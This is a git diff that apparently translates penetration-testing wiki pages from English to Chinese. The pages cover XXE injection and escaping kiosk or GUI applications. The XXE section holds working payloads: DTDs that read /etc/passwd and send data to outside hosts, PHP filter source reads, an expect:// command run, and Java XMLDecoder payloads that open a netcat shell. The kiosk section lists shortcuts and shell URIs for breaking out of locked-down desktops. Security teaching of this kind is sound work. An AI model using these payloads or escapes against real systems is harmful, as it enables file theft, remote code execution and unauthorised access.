-You can use the \[**"Encode Recipe**" of cyberchef here ]\(\[[https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7](https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7) %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to]\([https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7 %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to](https://gchq.github.io/CyberChef/#recipe=Encode_text%28%27UTF-7%20%2865000%29%27%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to)) transform to UTF-7.
-
+您可以在这里使用 \[**"Encode Recipe**" of cyberchef\](https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7%20%2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4) 将其转换为 UTF-7。
 ```xml
 <!xml version="1.0" encoding="UTF-7"?-->
 +ADw-+ACE-DOCTYPE+ACA-foo+ACA-+AFs-+ADw-+ACE-ENTITY+ACA-example+ACA-SYSTEM+ACA-+ACI-/etc/passwd+ACI-+AD4-+ACA-+AF0-+AD4-+AAo-+ADw-stockCheck+AD4-+ADw-productId+AD4-+ACY-example+ADs-+ADw-/productId+AD4-+ADw-storeId+AD4-1+ADw-/storeId+AD4-+ADw-/stockCheck+AD4-
@@ -479,81 +422,67 @@ You can use the \[**"Encode Recipe**" of cyberchef here ]\(\[[https://gchq.githu
 +ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
 +ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
 ```
+### File:/ 协议绕过
 
-### File:/ Protocol Bypass
+如果网站使用 PHP，可以使用 **php wrappers** `php://filter/convert.base64-encode/resource=` 来 **访问内部文件**。
 
-If the web is using PHP, instead of using `file:/` you can use **php wrappers**`php://filter/convert.base64-encode/resource=` to **access internal files**.
+如果网站使用 Java，您可以检查 [**jar: 协议**](xxe-xee-xml-external-entity.md#jar-protocol)。
 
-If the web is using Java you may check the [**jar: protocol**](xxe-xee-xml-external-entity.md#jar-protocol).
-
-### HTML Entities
-
-Trick from [**https://github.com/Ambrotd/XXE-Notes**](https://github.com/Ambrotd/XXE-Notes)\
-You can create an **entity inside an entity** encoding it with **html entities** and then call it to **load a dtd**.\
-Note that the **HTML Entities** used needs to be **numeric** (like \[in this example]\([https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity%28true,'Numeric entities'%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\\](<https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity%28true,%27Numeric%20entities%27%29&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)%5C>)).
+### HTML 实体
 
+来自 [**https://github.com/Ambrotd/XXE-Notes**](https://github.com/Ambrotd/XXE-Notes)\
+您可以创建一个 **实体内部的实体**，通过 **html 实体** 编码，然后调用它来 **加载 dtd**。\
+请注意，使用的 **HTML 实体** 需要是 **数字**（如 \[在这个例子中]\([https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity%28true,'Numeric entities'%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\\](<https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity%28true,%27Numeric%20entities%27%29&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)%5C>)).
 ```xml
 <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % a "&#x3C;&#x21;&#x45;&#x4E;&#x54;&#x49;&#x54;&#x59;&#x25;&#x64;&#x74;&#x64;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4D;&#x22;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6F;&#x75;&#x72;&#x73;&#x65;&#x72;&#x76;&#x65;&#x72;&#x2E;&#x63;&#x6F;&#x6D;&#x2F;&#x62;&#x79;&#x70;&#x61;&#x73;&#x73;&#x2E;&#x64;&#x74;&#x64;&#x22;&#x3E;" >%a;%dtd;]>
 <data>
-    <env>&exfil;</env>
+<env>&exfil;</env>
 </data>
 ```
-
-DTD example:
-
+DTD 示例：
 ```xml
 <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/flag">
 <!ENTITY % abt "<!ENTITY exfil SYSTEM 'http://172.17.0.1:7878/bypass.xml?%data;'>">
 %abt;
 %exfil;
 ```
-
-## PHP Wrappers
+## PHP 包装器
 
 ### Base64
 
-**Extract** _**index.php**_
-
+**提取** _**index.php**_
 ```xml
 <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
 ```
-
-#### **Extract external resource**
-
+#### **提取外部资源**
 ```xml
 <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.0.3"> ]>
 ```
+### 远程代码执行
 
-### Remote code execution
-
-**If PHP "expect" module is loaded**
-
+**如果加载了 PHP "expect" 模块**
 ```xml
 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [ <!ELEMENT foo ANY >
 <!ENTITY xxe SYSTEM "expect://id" >]>
 <creds>
-    <user>&xxe;</user>
-    <pass>mypass</pass>
+<user>&xxe;</user>
+<pass>mypass</pass>
 </creds>
 ```
-
 ## **SOAP - XEE**
-
 ```xml
 <soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
 ```
-
 ## XLIFF - XXE
 
-This example is inspired in [https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe](https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe)
+这个例子灵感来源于 [https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe](https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe)
 
-XLIFF (XML Localization Interchange File Format) is utilized to standardize data exchange in localization processes. It's an XML-based format primarily used for transferring localizable data among tools during localization and as a common exchange format for CAT (Computer-Aided Translation) tools.
+XLIFF (XML 本地化交换文件格式) 用于标准化本地化过程中的数据交换。它是一种基于 XML 的格式，主要用于在本地化过程中在工具之间传输可本地化数据，并作为计算机辅助翻译 (CAT) 工具的通用交换格式。
 
 ### Blind Request Analysis
 
-A request is made to the server with the following content:
-
+向服务器发送了以下内容的请求：
 ```xml
 ------WebKitFormBoundaryqBdAsEtYaBjTArl3
 Content-Disposition: form-data; name="file"; filename="xxe.xliff"
@@ -565,21 +494,17 @@ Content-Type: application/x-xliff+xml
 <xliff srcLang="en" trgLang="ms-MY" version="2.0"></xliff>
 ------WebKitFormBoundaryqBdAsEtYaBjTArl3--
 ```
-
-However, this request triggers an internal server error, specifically mentioning a problem with the markup declarations:
-
+然而，此请求触发了内部服务器错误，特别提到标记声明的问题：
 ```json
 {
-  "status": 500,
-  "error": "Internal Server Error",
-  "message": "Error systemId: http://redacted.burpcollaborator.net/?xxe_test; The markup declarations contained or pointed to by the document type declaration must be well-formed."
+"status": 500,
+"error": "Internal Server Error",
+"message": "Error systemId: http://redacted.burpcollaborator.net/?xxe_test; The markup declarations contained or pointed to by the document type declaration must be well-formed."
 }
 ```
+尽管出现错误，但在 Burp Collaborator 上记录到了一次命中，表明与外部实体有一定程度的交互。
 
-Despite the error, a hit is recorded on Burp Collaborator, indicating some level of interaction with the external entity.
-
-Out of Band Data Exfiltration To exfiltrate data, a modified request is sent:
-
+Out of Band Data Exfiltration 为了提取数据，发送了一个修改过的请求：
 ```
 ------WebKitFormBoundaryqBdAsEtYaBjTArl3
 Content-Disposition: form-data; name="file"; filename="xxe.xliff"
@@ -591,43 +516,35 @@ Content-Type: application/x-xliff+xml
 <xliff srcLang="en" trgLang="ms-MY" version="2.0"></xliff>
 ------WebKitFormBoundaryqBdAsEtYaBjTArl3--
 ```
+这种方法揭示了用户代理指示使用 Java 1.8。这个版本的 Java 的一个显著限制是无法使用带外技术检索包含换行符的文件，例如 /etc/passwd。
 
-This approach reveals that the User Agent indicates the use of Java 1.8. A noted limitation with this version of Java is the inability to retrieve files containing a newline character, such as /etc/passwd, using the Out of Band technique.
-
-Error-Based Data Exfiltration To overcome this limitation, an Error-Based approach is employed. The DTD file is structured as follows to trigger an error that includes data from a target file:
-
+基于错误的数据外泄 为了克服这个限制，采用了基于错误的方法。DTD 文件的结构如下，以触发包含目标文件数据的错误：
 ```xml
 <!ENTITY % data SYSTEM "file:///etc/passwd">
 <!ENTITY % foo "<!ENTITY &#37; xxe SYSTEM 'file:///nofile/'>">
 %foo;
 %xxe;
 ```
-
-The server responds with an error, importantly reflecting the non-existent file, indicating that the server is attempting to access the specified file:
-
+服务器响应错误，重要的是反映出不存在的文件，表明服务器正在尝试访问指定的文件：
 ```javascript
 {"status":500,"error":"Internal Server Error","message":"IO error.\nReason: /nofile (No such file or directory)"}
 ```
-
-To include the file's content in the error message, the DTD file is adjusted:
-
+要在错误消息中包含文件的内容，需要调整 DTD 文件：
 ```xml
 <!ENTITY % data SYSTEM "file:///etc/passwd">
 <!ENTITY % foo "<!ENTITY &#37; xxe SYSTEM 'file:///nofile/%data;'>">
 %foo;
 %xxe;
 ```
-
-This modification leads to the successful exfiltration of the file's content, as it is reflected in the error output sent via HTTP. This indicates a successful XXE (XML External Entity) attack, leveraging both Out of Band and Error-Based techniques to extract sensitive information.
+此修改导致文件内容成功外泄，因为它反映在通过HTTP发送的错误输出中。这表明成功进行了XXE（XML外部实体）攻击，利用了带外和基于错误的技术来提取敏感信息。
 
 ## RSS - XEE
 
-Valid XML with RSS format to exploit an XXE vulnerability.
+有效的RSS格式XML以利用XXE漏洞。
 
 ### Ping back
 
-Simple HTTP request to attackers server
-
+简单的HTTP请求到攻击者服务器
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE title [ <!ELEMENT title ANY >
@@ -648,9 +565,7 @@ Simple HTTP request to attackers server
 </channel>
 </rss>
 ```
-
-### Read file
-
+### 读取文件
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE title [ <!ELEMENT title ANY >
@@ -671,11 +586,9 @@ Simple HTTP request to attackers server
 </channel>
 </rss>
 ```
+### 阅读源代码
 
-### Read source code
-
-Using PHP base64 filter
-
+使用 PHP base64 过滤器
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE title [ <!ELEMENT title ANY >
@@ -696,84 +609,79 @@ Using PHP base64 filter
 </channel>
 </rss>
 ```
+## Java XMLDecoder XEE 到 RCE
 
-## Java XMLDecoder XEE to RCE
-
-XMLDecoder is a Java class that creates objects based on a XML message. If a malicious user can get an application to use arbitrary data in a call to the method **readObject**, he will instantly gain code execution on the server.
-
-### Using Runtime().exec()
+XMLDecoder 是一个 Java 类，它根据 XML 消息创建对象。如果恶意用户能够让应用程序在调用 **readObject** 方法时使用任意数据，他将立即获得服务器上的代码执行权限。
 
+### 使用 Runtime().exec()
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
 <java version="1.7.0_21" class="java.beans.XMLDecoder">
- <object class="java.lang.Runtime" method="getRuntime">
-      <void method="exec">
-      <array class="java.lang.String" length="6">
-          <void index="0">
-              <string>/usr/bin/nc</string>
-          </void>
-          <void index="1">
-              <string>-l</string>
-          </void>
-          <void index="2">
-              <string>-p</string>
-          </void>
-          <void index="3">
-              <string>9999</string>
-          </void>
-          <void index="4">
-              <string>-e</string>
-          </void>
-          <void index="5">
-              <string>/bin/sh</string>
-          </void>
-      </array>
-      </void>
- </object>
+<object class="java.lang.Runtime" method="getRuntime">
+<void method="exec">
+<array class="java.lang.String" length="6">
+<void index="0">
+<string>/usr/bin/nc</string>
+</void>
+<void index="1">
+<string>-l</string>
+</void>
+<void index="2">
+<string>-p</string>
+</void>
+<void index="3">
+<string>9999</string>
+</void>
+<void index="4">
+<string>-e</string>
+</void>
+<void index="5">
+<string>/bin/sh</string>
+</void>
+</array>
+</void>
+</object>
 </java>
 ```
-
 ### ProcessBuilder
-
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
 <java version="1.7.0_21" class="java.beans.XMLDecoder">
-  <void class="java.lang.ProcessBuilder">
-    <array class="java.lang.String" length="6">
-      <void index="0">
-        <string>/usr/bin/nc</string>
-      </void>
-      <void index="1">
-         <string>-l</string>
-      </void>
-      <void index="2">
-         <string>-p</string>
-      </void>
-      <void index="3">
-         <string>9999</string>
-      </void>
-      <void index="4">
-         <string>-e</string>
-      </void>
-      <void index="5">
-         <string>/bin/sh</string>
-      </void>
-    </array>
-    <void method="start" id="process">
-    </void>
-  </void>
+<void class="java.lang.ProcessBuilder">
+<array class="java.lang.String" length="6">
+<void index="0">
+<string>/usr/bin/nc</string>
+</void>
+<void index="1">
+<string>-l</string>
+</void>
+<void index="2">
+<string>-p</string>
+</void>
+<void index="3">
+<string>9999</string>
+</void>
+<void index="4">
+<string>-e</string>
+</void>
+<void index="5">
+<string>/bin/sh</string>
+</void>
+</array>
+<void method="start" id="process">
+</void>
+</void>
 </java>
 ```
-
-## Tools
+## 工具
 
 {% embed url="https://github.com/luisfontes19/xxexploiter" %}
 
-## References
+## 参考资料
 
 - [https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf](https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf)\\
 - [https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html](https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html)\\
-- Extract info via HTTP using own external DTD: [https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/](https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/)\\
+- 通过 HTTP 使用自定义外部 DTD 提取信息: [https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/](https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/)\\
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection)\\
 - [https://gist.github.com/staaldraad/01415b990939494879b4](https://gist.github.com/staaldraad/01415b990939494879b4)\\
 - [https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9](https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9)\\
@@ -785,4 +693,3 @@ XMLDecoder is a Java class that creates objects based on a XML message. If a mal
 {% embed url="https://websec.nl/" %}
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/physical-attacks/escaping-from-gui-applications/README.md b/src/physical-attacks/escaping-from-gui-applications/README.md
index ea8540f34..dbe13e1cb 100644
--- a/src/physical-attacks/escaping-from-gui-applications/README.md
+++ b/src/physical-attacks/escaping-from-gui-applications/README.md
@@ -1,47 +1,47 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-# Check for possible actions inside the GUI application
+# 检查 GUI 应用程序内可能的操作
 
-**Common Dialogs** are those options of **saving a file**, **opening a file**, selecting a font, a color... Most of them will **offer a full Explorer functionality**. This means that you will be able to access Explorer functionalities if you can access these options:
+**常见对话框**是指**保存文件**、**打开文件**、选择字体、颜色等选项。大多数情况下，它们将**提供完整的资源管理器功能**。这意味着如果您可以访问这些选项，您将能够访问资源管理器的功能：
 
-- Close/Close as
-- Open/Open with
-- Print
-- Export/Import
-- Search
-- Scan
+- 关闭/另存为
+- 打开/使用其他程序打开
+- 打印
+- 导出/导入
+- 搜索
+- 扫描
 
-You should check if you can:
+您应该检查是否可以：
 
-- Modify or create new files
-- Create symbolic links
-- Get access to restricted areas
-- Execute other apps
+- 修改或创建新文件
+- 创建符号链接
+- 访问受限区域
+- 执行其他应用程序
 
-## Command Execution
+## 命令执行
 
-Maybe **using a `Open with`** option\*\* you can open/execute some kind of shell.
+也许**使用 `Open with`** 选项，您可以打开/执行某种 shell。
 
 ### Windows
 
-For example _cmd.exe, command.com, Powershell/Powershell ISE, mmc.exe, at.exe, taskschd.msc..._ find more binaries that can be used to execute commands (and perform unexpected actions) here: [https://lolbas-project.github.io/](https://lolbas-project.github.io)
+例如 _cmd.exe, command.com, Powershell/Powershell ISE, mmc.exe, at.exe, taskschd.msc..._ 在这里找到更多可以用来执行命令（并执行意外操作）的二进制文件：[https://lolbas-project.github.io/](https://lolbas-project.github.io)
 
 ### \*NIX \_\_
 
-_bash, sh, zsh..._ More here: [https://gtfobins.github.io/](https://gtfobins.github.io)
+_bash, sh, zsh..._ 更多信息请见：[https://gtfobins.github.io/](https://gtfobins.github.io)
 
 # Windows
 
-## Bypassing path restrictions
+## 绕过路径限制
 
-- **Environment variables**: There are a lot of environment variables that are pointing to some path
-- **Other protocols**: _about:, data:, ftp:, file:, mailto:, news:, res:, telnet:, view-source:_
-- **Symbolic links**
-- **Shortcuts**: CTRL+N (open new session), CTRL+R (Execute Commands), CTRL+SHIFT+ESC (Task Manager), Windows+E (open explorer), CTRL-B, CTRL-I (Favourites), CTRL-H (History), CTRL-L, CTRL-O (File/Open Dialog), CTRL-P (Print Dialog), CTRL-S (Save As)
-  - Hidden Administrative menu: CTRL-ALT-F8, CTRL-ESC-F9
-- **Shell URIs**: _shell:Administrative Tools, shell:DocumentsLibrary, shell:Librariesshell:UserProfiles, shell:Personal, shell:SearchHomeFolder, shell:Systemshell:NetworkPlacesFolder, shell:SendTo, shell:UsersProfiles, shell:Common Administrative Tools, shell:MyComputerFolder, shell:InternetFolder_
-- **UNC paths**: Paths to connect to shared folders. You should try to connect to the C$ of the local machine ("\\\127.0.0.1\c$\Windows\System32")
-  - **More UNC paths:**
+- **环境变量**：有很多环境变量指向某个路径
+- **其他协议**：_about:, data:, ftp:, file:, mailto:, news:, res:, telnet:, view-source:_
+- **符号链接**
+- **快捷方式**：CTRL+N（打开新会话），CTRL+R（执行命令），CTRL+SHIFT+ESC（任务管理器），Windows+E（打开资源管理器），CTRL-B，CTRL-I（收藏夹），CTRL-H（历史记录），CTRL-L，CTRL-O（文件/打开对话框），CTRL-P（打印对话框），CTRL-S（另存为）
+- 隐藏的管理菜单：CTRL-ALT-F8，CTRL-ESC-F9
+- **Shell URIs**：_shell:Administrative Tools, shell:DocumentsLibrary, shell:Librariesshell:UserProfiles, shell:Personal, shell:SearchHomeFolder, shell:Systemshell:NetworkPlacesFolder, shell:SendTo, shell:UsersProfiles, shell:Common Administrative Tools, shell:MyComputerFolder, shell:InternetFolder_
+- **UNC 路径**：连接到共享文件夹的路径。您应该尝试连接到本地计算机的 C$（"\\\127.0.0.1\c$\Windows\System32"）
+- **更多 UNC 路径：**
 
 | UNC                       | UNC            | UNC                  |
 | ------------------------- | -------------- | -------------------- |
@@ -55,13 +55,13 @@ _bash, sh, zsh..._ More here: [https://gtfobins.github.io/](https://gtfobins.git
 | %TMP%                     | %USERDOMAIN%   | %USERNAME%           |
 | %USERPROFILE%             | %WINDIR%       |                      |
 
-## Download Your Binaries
+## 下载您的二进制文件
 
-Console: [https://sourceforge.net/projects/console/](https://sourceforge.net/projects/console/)\
-Explorer: [https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/](https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/)\
-Registry editor: [https://sourceforge.net/projects/uberregedit/](https://sourceforge.net/projects/uberregedit/)
+控制台：[https://sourceforge.net/projects/console/](https://sourceforge.net/projects/console/)\
+资源管理器：[https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/](https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/)\
+注册表编辑器：[https://sourceforge.net/projects/uberregedit/](https://sourceforge.net/projects/uberregedit/)
 
-## Accessing filesystem from the browser
+## 从浏览器访问文件系统
 
 | PATH                | PATH              | PATH               | PATH                |
 | ------------------- | ----------------- | ------------------ | ------------------- |
@@ -73,47 +73,47 @@ Registry editor: [https://sourceforge.net/projects/uberregedit/](https://sourcef
 | %TEMP%              | %SYSTEMDRIVE%     | %SYSTEMROOT%       | %APPDATA%           |
 | %HOMEDRIVE%         | %HOMESHARE        |                    | <p><br></p>         |
 
-## ShortCuts
+## 快捷键
 
-- Sticky Keys – Press SHIFT 5 times
+- Sticky Keys – 按 SHIFT 5 次
 - Mouse Keys – SHIFT+ALT+NUMLOCK
 - High Contrast – SHIFT+ALT+PRINTSCN
-- Toggle Keys – Hold NUMLOCK for 5 seconds
-- Filter Keys – Hold right SHIFT for 12 seconds
-- WINDOWS+F1 – Windows Search
-- WINDOWS+D – Show Desktop
-- WINDOWS+E – Launch Windows Explorer
-- WINDOWS+R – Run
-- WINDOWS+U – Ease of Access Centre
-- WINDOWS+F – Search
-- SHIFT+F10 – Context Menu
-- CTRL+SHIFT+ESC – Task Manager
-- CTRL+ALT+DEL – Splash screen on newer Windows versions
-- F1 – Help F3 – Search
-- F6 – Address Bar
-- F11 – Toggle full screen within Internet Explorer
-- CTRL+H – Internet Explorer History
-- CTRL+T – Internet Explorer – New Tab
-- CTRL+N – Internet Explorer – New Page
-- CTRL+O – Open File
-- CTRL+S – Save CTRL+N – New RDP / Citrix
+- Toggle Keys – 按住 NUMLOCK 5 秒
+- Filter Keys – 按住右 SHIFT 12 秒
+- WINDOWS+F1 – Windows 搜索
+- WINDOWS+D – 显示桌面
+- WINDOWS+E – 启动 Windows 资源管理器
+- WINDOWS+R – 运行
+- WINDOWS+U – 辅助功能中心
+- WINDOWS+F – 搜索
+- SHIFT+F10 – 上下文菜单
+- CTRL+SHIFT+ESC – 任务管理器
+- CTRL+ALT+DEL – 在较新版本的 Windows 上显示启动画面
+- F1 – 帮助 F3 – 搜索
+- F6 – 地址栏
+- F11 – 在 Internet Explorer 中切换全屏
+- CTRL+H – Internet Explorer 历史记录
+- CTRL+T – Internet Explorer – 新标签
+- CTRL+N – Internet Explorer – 新页面
+- CTRL+O – 打开文件
+- CTRL+S – 保存 CTRL+N – 新 RDP / Citrix
 
-## Swipes
+## 滑动操作
 
-- Swipe from the left side to the right to see all open Windows, minimizing the KIOSK app and accessing the whole OS directly;
-- Swipe from the right side to the left to open Action Center, minimizing the KIOSK app and accessing the whole OS directly;
-- Swipe in from the top edge to make the title bar visible for an app opened in full screen mode;
-- Swipe up from the bottom to show the taskbar in a full screen app.
+- 从左侧向右滑动以查看所有打开的窗口，最小化 KIOSK 应用程序并直接访问整个操作系统；
+- 从右侧向左滑动以打开操作中心，最小化 KIOSK 应用程序并直接访问整个操作系统；
+- 从顶部边缘向下滑动以使全屏模式下的应用程序的标题栏可见；
+- 从底部向上滑动以在全屏应用程序中显示任务栏。
 
-## Internet Explorer Tricks
+## Internet Explorer 技巧
 
-### 'Image Toolbar'
+### '图像工具栏'
 
-It's a toolbar that appears on the top-left of image when it's clicked. You will be able to Save, Print, Mailto, Open "My Pictures" in Explorer. The Kiosk needs to be using Internet Explorer.
+这是一个在图像被点击时出现在左上角的工具栏。您将能够保存、打印、发送邮件、在资源管理器中打开“我的图片”。Kiosk 需要使用 Internet Explorer。
 
-### Shell Protocol
+### Shell 协议
 
-Type this URLs to obtain an Explorer view:
+输入这些 URL 以获取资源管理器视图：
 
 - `shell:Administrative Tools`
 - `shell:DocumentsLibrary`
@@ -132,54 +132,54 @@ Type this URLs to obtain an Explorer view:
 - `Shell:System`
 - `Shell:ControlPanelFolder`
 - `Shell:Windows`
-- `shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}` --> Control Panel
-- `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}` --> My Computer
-- `shell:::{{208D2C60-3AEA-1069-A2D7-08002B30309D}}` --> My Network Places
+- `shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}` --> 控制面板
+- `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}` --> 我的电脑
+- `shell:::{{208D2C60-3AEA-1069-A2D7-08002B30309D}}` --> 我的网络位置
 - `shell:::{871C5380-42A0-1069-A2EA-08002B30309D}` --> Internet Explorer
 
-## Show File Extensions
+## 显示文件扩展名
 
-Check this page for more information: [https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)
+请查看此页面以获取更多信息：[https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)
 
-# Browsers tricks
+# 浏览器技巧
 
-Backup iKat versions:
+备份 iKat 版本：
 
 [http://swin.es/k/](http://swin.es/k/)\
 [http://www.ikat.kronicd.net/](http://www.ikat.kronicd.net)\
 
-Create a common dialog using JavaScript and access file explorer: `document.write('<input/type=file>')`  
-Source: https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811defa0
+使用 JavaScript 创建一个通用对话框并访问文件资源管理器：`document.write('<input/type=file>')`
+来源：https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811defa0
 
 # iPad
 
-## Gestures and bottoms
+## 手势和按钮
 
-- Swipe up with four (or five) fingers / Double-tap Home button: To view the multitask view and change App
+- 用四个（或五个）手指向上滑动 / 双击主屏幕按钮：查看多任务视图并更改应用程序
 
-- Swipe one way or another with four or five fingers: In order to change to the next/last App
+- 用四个或五个手指向一个方向滑动：以更改到下一个/上一个应用程序
 
-- Pinch the screen with five fingers / Touch Home button / Swipe up with 1 finger from the bottom of the screen in a quick motion to the up: To access Home
+- 用五个手指捏合屏幕 / 按住主屏幕按钮 / 用一根手指快速从屏幕底部向上滑动：访问主屏幕
 
-- Swipe one finger from the bottom of the screen just 1-2 inches (slow): The dock will appear
+- 用一根手指从屏幕底部滑动 1-2 英寸（慢）：停靠栏将出现
 
-- Swipe down from the top of the display with 1 finger: To view your notifications
+- 用一根手指从显示器顶部向下滑动：查看通知
 
-- Swipe down with 1 finger the top-right corner of the screen: To see iPad Pro's control centre
+- 用一根手指从屏幕右上角向下滑动：查看 iPad Pro 的控制中心
 
-- Swipe 1 finger from the left of the screen 1-2 inches: To see Today view
+- 用一根手指从屏幕左侧滑动 1-2 英寸：查看今日视图
 
-- Swipe fast 1 finger from the centre of the screen to the right or left: To change to next/last App
+- 用一根手指快速从屏幕中心向右或向左滑动：更改到下一个/上一个应用程序
 
-- Press and hold the On/**Off**/Sleep button at the upper-right corner of the **iPad +** Move the Slide to **power off** slider all the way to the right: To power off
+- 按住右上角的开/关/睡眠按钮 + 将滑块移动到右侧以**关闭电源**：关闭电源
 
-- Press the On/**Off**/Sleep button at the upper-right corner of the **iPad and the Home button for a few second**: To force a hard power off
+- 按住右上角的开/关/睡眠按钮和主屏幕按钮几秒钟：强制硬关机
 
-- Press the On/**Off**/Sleep button at the upper-right corner of the **iPad and the Home button quickly**: To take a screenshot that will pop up in the lower left of the display. Press both buttons at the same time very briefly as if you hold them a few seconds a hard power off will be performed.
+- 快速按住右上角的开/关/睡眠按钮和主屏幕按钮：截屏，截屏将弹出在显示器的左下角。两者同时按下非常短暂，如果按住几秒钟将执行硬关机。
 
-## Shortcuts
+## 快捷键
 
-You should have an iPad keyboard or a USB keyboard adaptor. Only shortcuts that could help escaping from the application will be shown here.
+您应该有一个 iPad 键盘或 USB 键盘适配器。这里只显示可能帮助您逃离应用程序的快捷键。
 
 | Key | Name         |
 | --- | ------------ |
@@ -194,79 +194,79 @@ You should have an iPad keyboard or a USB keyboard adaptor. Only shortcuts that
 | ↑   | Up Arrow     |
 | ↓   | Down Arrow   |
 
-### System shortcuts
+### 系统快捷键
 
-These shortcuts are for the visual settings and sound settings, depending on the use of the iPad.
+这些快捷键用于视觉设置和声音设置，具体取决于 iPad 的使用。
 
 | Shortcut | Action                                                                         |
 | -------- | ------------------------------------------------------------------------------ |
-| F1       | Dim Sscreen                                                                    |
-| F2       | Brighten screen                                                                |
-| F7       | Back one song                                                                  |
-| F8       | Play/pause                                                                     |
-| F9       | Skip song                                                                      |
-| F10      | Mute                                                                           |
-| F11      | Decrease volume                                                                |
-| F12      | Increase volume                                                                |
-| ⌘ Space  | Display a list of available languages; to choose one, tap the space bar again. |
+| F1       | 调暗屏幕                                                                    |
+| F2       | 提亮屏幕                                                                |
